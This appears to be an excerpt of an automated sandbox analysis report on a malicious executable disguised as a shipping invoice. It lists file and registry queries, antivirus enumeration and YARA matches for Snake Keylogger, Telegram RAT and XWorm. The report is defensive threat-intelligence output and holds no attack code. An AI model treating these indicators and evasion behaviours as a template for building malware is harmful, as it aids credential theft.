Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Users\user\AppData\Roaming\HOYVjVj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Users\user\AppData\Roaming\HOYVjVj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bxhciy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bdeukn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bxhciy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Queries volume information: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Queries volume information: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SCS AWB and Commercial Invoice.exe, 00000009.00000002.4506291707.0000000001436000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.0000000003716000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.00000000037CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4538875591.0000000140019000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.00000000034CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003963000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 7644, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
